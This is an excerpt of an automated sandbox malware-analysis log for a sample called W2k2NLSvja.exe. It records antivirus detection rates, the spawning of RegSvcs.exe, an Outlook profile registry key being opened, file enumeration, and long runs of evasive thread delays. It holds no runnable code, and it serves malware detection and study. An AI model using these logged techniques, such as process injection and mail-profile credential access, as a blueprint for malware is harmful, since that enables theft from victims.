                Source: C:\Users\user\Desktop\W2k2NLSvja.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: W2k2NLSvja.exeVirustotal: Detection: 71%
                Source: W2k2NLSvja.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\W2k2NLSvja.exe "C:\Users\user\Desktop\W2k2NLSvja.exe"
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\W2k2NLSvja.exe"
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\W2k2NLSvja.exe"Jump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: W2k2NLSvja.exeStatic file information: File size 1056256 > 1048576
                Source: W2k2NLSvja.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: W2k2NLSvja.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: W2k2NLSvja.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: W2k2NLSvja.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: W2k2NLSvja.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: W2k2NLSvja.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: W2k2NLSvja.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: W2k2NLSvja.exe, 00000000.00000003.2035571464.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, W2k2NLSvja.exe, 00000000.00000003.2034512449.0000000003D60000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: W2k2NLSvja.exe, 00000000.00000003.2035571464.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, W2k2NLSvja.exe, 00000000.00000003.2034512449.0000000003D60000.00000004.00001000.00020000.00000000.sdmp
                Source: W2k2NLSvja.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: W2k2NLSvja.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: W2k2NLSvja.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: W2k2NLSvja.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: W2k2NLSvja.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FFC304 LoadLibraryA,GetProcAddress,0_2_00FFC304
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA8B85 push ecx; ret 0_2_00FA8B98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_014C2F80 push es; ret 2_2_014C2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_018C9C30 push esp; retf 0321h2_2_018C9D55
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F84A35
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_010055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_010055FD
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FA33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FA33C7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeAPI/Special instruction interceptor: Address: F53274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599327Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599216Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598998Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598868Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598394Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598257Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597264Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595832Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595591Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595373Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595155Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594935Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3192Jump to behavior
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99517
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeAPI coverage: 4.4 %
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FE4696
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FEC9C7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEC93C FindFirstFileW,FindClose,0_2_00FEC93C
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF200
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF35D
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEF65E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3A2B
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3D4E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEBF27
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00F84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F84AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599327Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599216Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598998Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598868Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598394Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598257Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597264Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595832Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595591Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595373Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595155Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594935Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594281Jump to behavior
